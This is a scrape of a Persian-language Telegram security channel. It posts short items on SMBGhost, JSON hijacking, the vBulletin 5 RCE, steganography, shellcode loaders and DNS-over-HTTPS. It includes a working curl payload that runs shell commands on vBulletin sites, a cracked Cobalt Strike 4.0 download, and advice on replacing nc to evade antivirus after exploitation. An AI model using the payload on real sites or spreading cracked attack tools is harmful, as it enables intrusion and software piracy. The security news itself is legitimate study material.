Security Analysis – Telegram
Security Analysis
11.5K subscribers
344 photos
50 videos
36 files
885 links
- Offensive Security (Red Teaming / PenTesting)
- BlueTeam (OperationSec, TreatHunting, DFIR)
- Reverse Engineering / Malware Analysis
- Web Security
- Cryptography
- Steganography
- Forensics
Contact : @DrPwner
Download Telegram
#smb #smbghost #cve_2020_0796
از آسیب پذیری‌های جدیدی که سر و صدا به پا کرده آسیب‌پذیری SMBGhost با CVE-2020-0796 هست. در پروتکل SMB یک هدر با نام COMPRESSION_TRANSFORM_HEADER وجود داره که شامل 5 هدر فوق می‌باشد:
- ProtocolId
- OriginalCompressedSegmentSize
- CompressionAlgorithm
- Flags
- Offset/Length
آسیب‌پذیری مذکور از جایی شروع میشه که فانکشن srv2.sys از جمع دو مقدار OriginalCompressedSegmentSize و Offset/Length برای allocate کردن سایز بافر، بدون چک کردن معتبر بودن این آدرس استفاده میکنه.
برای توضیحات بیشتر پیشنهاد میکنم مطلب زیر رو از Mcafee بخونید
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/smbghost-analysis-of-cve-2020-0796
همچنین اسکنر این آسیب‌پذیری برای اثبات وجود و عدم وجود در سیستم رو میتونید از لینک زیر دریافت کنید:
https://github.com/ollypwn/SMBGhost
@securation
#json #json_hijacking #hijacking #api
یکی دیگه از آسیب‌پذیری‌های کمتر شناخته شده، آسیب‌پذیری Json Hijacking می‌باشد. به موجب این آسیب‌پذیری نفوذگر می‌تواند مقادیر بازگشتی Json را بدون اینکه نیاز به وجود آسیب‌پذیری CORS باشد بخواند. این آسیب‌پذیری در صورتی رخ می‌دهد که امکان ارسال درخواست با متد GET وجود داشته باشد. البته اگر خروجی Json هم اطلاعات حساسی نباشد می‌توان این آسیب‌پذیری را نادیده گرفت زیرا اطلاعات ارزشمندی در اختیار ما قرار نخواهد داد.
به منظور اکسپلویت این آسیب‌پذیری کافیست یک صفحه HTML ساخته و API را در تگ noscript آدرس‌دهی کرد. سپس با استفاده از
Object.prototype.__defineSetter__("key of the sensitive value")
به مقدار آن دسترسی پیدا کرد. حال کافیست نفوذگر شخص قربانی را به صفحه‌ی نوشته شده توسط نفوذگر هدایت کند تا مقدار حیاتی را به سرقت ببرد.
برای اطلاعات بیشتر می‌توانید از لینک زیر کمک بگیرید:
https://haacked.com/archive/2009/06/25/json-hijacking.aspx
@securation
👍1
Forwarded from Security Analysis
cobaltstrike4.0-Fixed.zip
24.4 MB
#CobaltStrike #Cobalt_Strike #RedTeam
دوستانی که در حوزه‌ی Red Team فعالیت می‌کنن حتما با ابزار Cobalt Strike آشنایی دارن. این ابزار یک فریمورک قدرتمند برای Post-Exploitation هست که آخرین نسخه اون یعنی 4 رو به صورت کاملا کرک شده قرار داده‌ایم.
قطعا خیلی از سازمان ها از اخرین تکنولوژی ها مانند ngfw ها و بهترین edr ها استفاده کرده اند. اما سوال این است آیا برای امن سازی پورت ۹۱۰۰ کاری انجام داده اید؟
این پورت مربوط به پرینترهای Officejet pro شرکت HP است که در صورتی که در شبکه خود دارید یا علاقه مند به دانستن خطرات باز بودن این پورت هستید خواندن مقاله زیر خالی از لطف نیست! 😃

“HP Officejet pro Printers dork by Rapidsafeguard”

https://link.medium.com/Csu2KxbLm7
A new pre-auth 0day RCE exploit for vBulletin 5:

https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/

POC: curl -s http://SITE/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("id"); exit;'

#web #expdev #rce #0day #darw1n @securation
https://engineering.fb.com/security/pysa/

Pysa: An open source static analysis tool to detect and prevent security issues in Python code

#article #tools #opensource #python #security #staticanalysis
@securation
https://blog.bitsrc.io/how-to-hide-secrets-in-strings-modern-text-hiding-in-javanoscript-613a9faa5787?gi=cce14b3afd96

StegCloak is a pure JavaScript steganography module designed in functional programming style, to hide secrets inside text by compressing and encrypting with Zero Width Characters. It can be used to safely watermark strings, invisible noscripts on webpages, texts on social media or for any other covert communication. Completely invisible!

Live demo :

https://stegcloak.surge.sh/

#tools #steganography #js
@securation
https://github.com/leoloobeek/COMRunner

A simple COM server which provides a component to run shellcode. Also includes a Windows JScript file to load the COM server and create the object with registration-free activation. This PoC COM server provides an object with a method that takes in base64 encoded shellcode and a method to run the shellcode.

#tools #opensource #shellcode
@securation
Google Chrome for Android (starting from Chrome 85) now support DNS-over-HTTPS (DoH) feature that, when enabled, can automatically switch to DNS-over-HTTPS if your current DNS provider supports it, or users can also provide a custom server address to prevent miscreants from interfering with domain name lookups, eventually stopping network observers, including your ISPs and attackers, from figuring out what sites you visit.
@securation
در بسیاری از موارد به هنگام post exploitation آنتی ویروس سرور مثلا nc را trojan میشناسه و حذفش میکنه !

در این مواقع میشه از موارد مشابه استفاده کرد ، مثال زیر یکی از tool هایی هستش که در این زمینه توسعه داده شده :

https://github.com/schollz/croc

Easily and securely send things from one computer to another
@securation
سایتی برای تبدیل کد‌های زبان‌های مختلف به Instruction با قابلیت انتخاب کامپایلر با نسخه‌های متفاوت.
همچنین با اشاره کردن با موس روی خط مورد نظر از کدتون، Instruction اون تیکه کد مورد نظرتون، با رنگ آبی هایلایت خواهد شد.
لینک سایت: https://godbolt.org

#Reverse_Engineering #مهندسی_معکوس #RE
@securation